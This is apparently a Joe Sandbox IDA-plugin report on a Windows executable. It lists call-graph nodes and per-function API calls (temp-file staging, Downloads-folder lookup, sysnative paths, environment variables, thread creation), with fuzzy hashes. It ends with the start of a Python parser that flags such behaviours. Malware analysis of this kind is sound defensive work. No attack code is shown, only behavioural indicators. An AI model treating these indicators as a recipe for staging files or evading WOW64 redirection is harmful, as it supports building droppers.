8553->8562 8563 4036ab 8553->8563 9402 40de80 GetLastError TlsGetValue SetLastError 8554->9402 8560 4035f9 8555->8560 8565 4035cc 8558->8565 8569 
40dec0 3 API calls 8560->8569 8561 40364b 9401 40de80 GetLastError TlsGetValue SetLastError 8561->9401 8567 403707 8562->8567 8568 4036de 8562->8568 9404 40de80 GetLastError TlsGetValue SetLastError 8563->9404 8564 403620 9384 40a83a 8564->9384 8575 40dec0 3 API calls 8565->8575 8566 40367e 9403 40de80 GetLastError TlsGetValue SetLastError 8566->9403 8572 403711 8567->8572 8573 40373a 8567->8573 9406 40de80 GetLastError TlsGetValue SetLastError 8568->9406 8578 4035d6 8569->8578 9408 40de80 GetLastError TlsGetValue SetLastError 8572->9408 8585 403744 8573->8585 8586 40376d 8573->8586 8575->8578 9377 40de80 GetLastError TlsGetValue SetLastError 8578->9377 8579 403653 8587 40a83a 17 API calls 8579->8587 8580 4036b1 9405 40de80 GetLastError TlsGetValue SetLastError 8580->9405 8583 403686 8594 40a83a 17 API calls 8583->8594 8584 4036e4 9407 40de80 GetLastError TlsGetValue SetLastError 8584->9407 9410 40de80 GetLastError TlsGetValue SetLastError 8585->9410 8591 403777 8586->8591 8592 40379d 8586->8592 8598 40365f 8587->8598 8589 4036b9 8599 40a83a 17 API calls 8589->8599 8590 403717 9409 40de80 GetLastError TlsGetValue SetLastError 8590->9409 9412 40de80 GetLastError TlsGetValue SetLastError 8591->9412 8606 4037f5 8592->8606 8607 4037a7 8592->8607 8593 40dec0 3 API calls 8593->8578 8602 403692 8594->8602 8608 40dec0 3 API calls 8598->8608 8610 4036c5 8599->8610 8613 40dec0 3 API calls 8602->8613 8603 40381f 8614 40e020 4 API calls 8603->8614 8604 4036ec 8615 40a83a 17 API calls 8604->8615 8605 40374a 9411 40de80 GetLastError TlsGetValue SetLastError 8605->9411 9442 40de80 GetLastError TlsGetValue SetLastError 8606->9442 9414 40de80 GetLastError TlsGetValue SetLastError 8607->9414 8608->8578 8620 40dec0 3 API calls 8610->8620 8611 40371f 8621 40a83a 17 API calls 8611->8621 8612 40377d 9413 40de80 GetLastError TlsGetValue SetLastError 8612->9413 8613->8578 8623 403827 8614->8623 8624 4036f8 8615->8624 8618 4037ad 9415 40de80 GetLastError TlsGetValue SetLastError 8618->9415 
8619 4037fb 9443 40de80 GetLastError TlsGetValue SetLastError 8619->9443 8620->8578 8628 40372b 8621->8628 9378 405170 TlsGetValue 8623->9378 8631 40dec0 3 API calls 8624->8631 8625 403752 8632 40a83a 17 API calls 8625->8632 8636 40dec0 3 API calls 8628->8636 8629 403785 8637 40a83a 17 API calls 8629->8637 8631->8578 8633 40375e 8632->8633 8639 40dec0 3 API calls 8633->8639 8634 4037b5 9416 409355 8634->9416 8635 403803 8641 40a7f5 5 API calls 8635->8641 8636->8578 8642 403791 8637->8642 8638 40382e 8643 40df50 HeapFree 8638->8643 8639->8578 8645 40380a 8641->8645 8646 40dec0 3 API calls 8642->8646 8647 403846 8643->8647 8649 40dec0 3 API calls 8645->8649 8646->8578 8650 40df50 HeapFree 8647->8650 8648 40dec0 3 API calls 8651 4037d0 8648->8651 8649->8578 8652 40384e 8650->8652 8653 4037e9 8651->8653 8654 4037dd 8651->8654 8652->7711 8656 401fa9 36 API calls 8653->8656 9439 405532 8654->9439 8657 4037e7 8656->8657 8657->8578 8658->7715 8659->7717 8661 40dfc0 21 API calls 8660->8661 8662 402c04 8661->8662 8663 4051a0 3 API calls 8662->8663 8664 402c0d 8663->8664 8665 405060 2 API calls 8664->8665 8666 402c19 8665->8666 8667 409ba0 RtlAllocateHeap 8666->8667 8668 402c23 GetShortPathNameW 8667->8668 9452 40de80 GetLastError TlsGetValue SetLastError 8668->9452 8670 402c3f 9453 40de80 GetLastError TlsGetValue SetLastError 8670->9453 8672 402c47 8673 409c10 5 API calls 8672->8673 8674 402c57 8673->8674 8675 40dec0 3 API calls 8674->8675 8676 402c61 8675->8676 9454 409b80 HeapFree 8676->9454 8678 402c6a 9455 40de80 GetLastError TlsGetValue SetLastError 8678->9455 8680 402c74 8681 40e020 4 API calls 8680->8681 8682 402c7c 8681->8682 9456 405170 TlsGetValue 8682->9456 8684 402c83 8685 40df50 HeapFree 8684->8685 8686 402c9a 8685->8686 8687 40df50 HeapFree 8686->8687 8688 402ca3 8687->8688 8689 40e080 TlsGetValue 8688->8689 8689->7721 8690->7723 8692 4098c7 SetEnvironmentVariableW 8691->8692 8693 404434 8691->8693 8692->8693 8693->7726 8695->7729 8696->7737 8698 40dfc0 21 API 

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                        • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(008C0000,00000000,?,?), ref: 0040E2C7
                                      • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A863
                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A875
                                      • wcscpy.MSVCRT ref: 0040A89B
                                      • wcscat.MSVCRT ref: 0040A8A6
                                      • wcslen.MSVCRT ref: 0040A8AC
                                      • CoTaskMemFree.OLE32(?,00000000,00000000,?,008C8F58,00000000,00000000), ref: 0040A8BA
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A8C1
                                      • wcscat.MSVCRT ref: 0040A8D9
                                      • wcslen.MSVCRT ref: 0040A8DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                      • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                      • API String ID: 1740785346-287042676
                                      • Opcode ID: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                      • Instruction ID: ae609db33c227b916d8c96984f24cc4820d8d1ee700964f601e6ad2a5a3ba7d8
                                      • Opcode Fuzzy Hash: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                      • Instruction Fuzzy Hash: C821F871344701B6D2303B62EC4EF6F2A78DB91B90F11483BF901B51D2D6BC8A6199AF

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                      • GetTempFileNameW.KERNEL32(?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000,004043B9), ref: 00401A2A
                                      • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024,00000000,00000000,?,00000000,00000000,00000400,00000000), ref: 00401A7F
                                      • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401AD4
                                      • PathAddBackslashW.SHLWAPI(00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,?,00417024), ref: 00401ADF
                                      • PathRenameExtensionW.SHLWAPI(?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000), ref: 00401B1E
                                      • GetTempFileNameW.KERNEL32(00417024,00000000,00000000,?,00000000,?,00000000,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00417024), ref: 00401B38
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                                      • String ID: $pA$$pA$$pA$$pA
                                      • API String ID: 368575804-1531182785
                                      • Opcode ID: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
                                      • Instruction ID: 28b0c429ac0839269b991b7b7970ea1d3eb295239ca2258b2b80e935eceb64c8
                                      • Opcode Fuzzy Hash: a7855c2fcb8ff53b5addb0dc43bc834e5fe5e71e8a4854cba452ae3e114c04c7
                                      • Instruction Fuzzy Hash: CD510AB1514600AED600BBB1EC4297F7B7EEB98319F01883FF544690A2CA3D985D9A6D

                                      Control-flow Graph

                                      APIs
                                      • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434
                                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                      • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
                                      • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                      • String ID: sysnative
                                      • API String ID: 3406704365-821172135
                                      • Opcode ID: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
                                      • Instruction ID: 2364f58bb10a159e0aa11294c57d56a9f179ba7a21fd77f55822fae8b4f54734
                                      • Opcode Fuzzy Hash: e5455a9928b97281f132b1c2dd1bbabf065e779dbb70284d860f41b952fb8df8
                                      • Instruction Fuzzy Hash: F5514075518701AAD600BBB2CC82B2F76A9AFD0709F10CC3FF544790D2CA7CD8599A6E

                                      Control-flow Graph

                                      APIs
                                      • memset.MSVCRT ref: 0040100F
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                        • Part of subcall function 0040DE30: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                                        • Part of subcall function 0040DE30: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                                        • Part of subcall function 00409B40: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                        • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(004186D0,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                                        • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                                        • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                                        • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
                                        • Part of subcall function 004053BB: InitializeCriticalSection.KERNEL32(004186A8,0040107B,00000000,00001000,00000000,00000000), ref: 004053C0
                                      • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                                        • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409DFF
                                        • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 00409E25
                                        • Part of subcall function 00409DE0: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 00409E82
                                        • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040A418
                                        • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A431
                                        • Part of subcall function 0040A3DA: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040A43B
                                        • Part of subcall function 0040A348: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A35B
                                        • Part of subcall function 0040A348: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,00417078,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A370
                                        • Part of subcall function 0040DBCA: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 0040DBFA
                                        • Part of subcall function 0040DBCA: memset.MSVCRT ref: 0040DC35
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 00401B8F: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048,00000000), ref: 00401BCD
                                        • Part of subcall function 00401B8F: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BEA
                                        • Part of subcall function 00401B8F: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040118B,00418048), ref: 00401BF2
                                      • HeapDestroy.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011B5
                                      • ExitProcess.KERNEL32(00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070), ref: 004011BA
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorHandleLastLibrarySectionValue$CommonControlsDestroyEnumExitInitLoadModuleProcessResourceTypes
                                      • String ID: .pA$:pA
                                      • API String ID: 2062415080-1142403416
                                      • Opcode ID: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
                                      • Instruction ID: 59fd392a0a4490bdbbe753bcbaae00d60dcbf108960a32b110b84fea6de29b28
                                      • Opcode Fuzzy Hash: aeb853c391caed1c2c3882624e056ccfb4376f2f5b63a4476772703c942bec8d
                                      • Instruction Fuzzy Hash: 6C313070A80704A9D210B7F29D43F9E3A25AB1874DF51843FB644790E3CEBC55489A6F

                                      Control-flow Graph (rendered graph not reproduced; legend: executed / not executed)
                                      Function 0x403DF3-0x40460D: nine near-identical string-building blocks (each calling 0x40DE80, 0x405DC0, 0x40DEC0 and 0x40E020), then the main body calling GetModuleHandleW, PathRemoveBackslashW and PathQuoteSpacesW (twice), a branch through either 0x405492 or 0x402CA9, and a final cleanup block at 0x40459B that calls 0x40DF50 ten times.
                                      APIs
                                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(008C0000,00000000,?), ref: 0040DEF9
                                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                        • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(008C0000,00000000,?,?), ref: 0040DF1C
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,008C8F58,00000000,00000000), ref: 004042FB
                                      • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 004043F4
                                        • Part of subcall function 00402BFA: GetShortPathNameW.KERNEL32(008C8F58,008C8F58,00002710), ref: 00402C34
                                        • Part of subcall function 0040E080: TlsGetValue.KERNEL32(0000000D,?,?,00401DCE,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E08A
                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                        • Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(008C8F58,008C8F58,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9
                                        • Part of subcall function 00401E55: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,00404476,00000000,00000000,00000000,008C8F58,008C8968,00000000,00000000), ref: 00401E8A
                                      • PathQuoteSpacesW.SHLWAPI(00000000,00000001,008C89E0,00000000,00000000,00000000,00000000,00000000,008C8F58,008C8968,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004044A7
                                      • PathQuoteSpacesW.SHLWAPI(00000000,00000000,00000000,0041702A,00000000,00000000,00000000,00000001,008C89E0,00000000,00000000,00000000,00000000,00000000,008C8F58,008C8968), ref: 004044E1
                                        • Part of subcall function 00405492: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,008C8F58), ref: 004054AB
                                        • Part of subcall function 00405492: EnterCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054BD
                                        • Part of subcall function 00405492: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054D4
                                        • Part of subcall function 00405492: CloseHandle.KERNEL32(00000008,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054E0
                                        • Part of subcall function 00405492: LeaveCriticalSection.KERNEL32(004186A8,?,?,?,?,00402E2C,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 00405523
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: Path$Value$QuoteSpaces$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseCreateEnterEnvironmentLeaveModuleNameObjectRemoveShortSingleThreadVariableWaitwcslen
                                      • String ID: *pA$*pA$pA
                                      • API String ID: 1881381519-978732049
                                      • Opcode ID: ce5de05abebdf408f752614a87581667f3532eea130c2f8d7aa08e5aeff42770
                                      • Instruction ID: c37fc5d70f496ddafb25d76fc072764247fdd107690a54ecab0fee76e679e4b9
                                      • Opcode Fuzzy Hash: ce5de05abebdf408f752614a87581667f3532eea130c2f8d7aa08e5aeff42770
                                      • Instruction Fuzzy Hash: 452219B5504700AED200BBB2D981A7F77BDEB94709F10CD3FF544AA192CA3CD8499B69

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                        • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(008C0000,00000000,?,?), ref: 0040E2C7
                                      • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A76D
                                      • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A77A
                                      • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040A78C
                                      • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040A799
                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A0D,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040A79E
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                      • String ID: GetLongPathNameW$Kernel32.DLL
                                      • API String ID: 820969696-2943376620
                                      • Opcode ID: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                                      • Instruction ID: 045e3bd93f30ce5257affd3ba06db84d60efd2c3f80f990f00f7183b84a9fd71
                                      • Opcode Fuzzy Hash: b8ec294df8f0a0b8a7015009ae644d8128c9ee2ea3c72b3c91f3911898e9698a
                                      • Instruction Fuzzy Hash: C0F0BE722052147FC2212BBAAC4CDAB3E7CDE96752700413AF905E2252EA79881082BD

                                      Control-flow Graph (rendered graph not reproduced; legend: executed / not executed)
                                      Function 0x40AAC0-0x40ACAB: four alternative CreateFileW call sites (0x40AB1C, 0x40AB5D, 0x40ABA7, 0x40ABC9) selected by the open mode, then HeapAlloc at 0x40AC0E and SetFilePointer at 0x40AC5C before the function returns through 0x40D40A.
                                      APIs
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB31
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040AB72
                                      • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040ABBC
                                      • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040ABDE
                                      • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040AC17
                                      • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040AC6A
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.4136234500.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000004.00000002.4136205784.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136285976.0000000000413000.00000002.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136315432.0000000000417000.00000004.00000001.01000000.00000007.sdmp
                                      • Associated: 00000004.00000002.4136335491.0000000000419000.00000002.00000001.01000000.00000007.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_400000_tg.jbxd
                                      Similarity
                                      • API ID: File$Create$AllocHeapPointer
                                      • String ID:
                                      • API String ID: 4207849991-0
                                      • Opcode ID: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                                      • Instruction ID: b1ded5e7b3c1179952fb066da43177db28dec5f90817629197f40925782b5e59
                                      • Opcode Fuzzy Hash: b3501de1549189c44e7e631b90cb851d7740b4e923cfc5c59c52eca9f0755e35
                                      • Instruction Fuzzy Hash: 1F51C0712483006BE3218F19DD44B6B7BF6EB44764F204A3AFA51A73E0D678EC55874A
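The per-function entries in this part of the report follow a fixed shape: an APIs list (direct calls plus "Part of subcall function" lines for callees), then a Similarity block with API ID, String ID and the opcode/instruction fuzzy hashes. The Python below is an added example, not Joe Sandbox code and not code from the analysed sample: it parses two entries copied from this page (the GetLongPathNameW resolver and the CreateFileW open routine above, with argument lists shortened), decodes the CreateFileW access and creation-disposition arguments using the real Win32 constant values, and applies a few heuristic flags. The flag names (dynamic-api-resolution, temp-dir-staging, wow64-sysnative-path, overwrites-files) and the choice of which API combinations trigger them are this example's own assumptions, not report output.

```python
"""Parse the per-function 'APIs' / 'Similarity' entries the Joe Sandbox IDA plugin emits,
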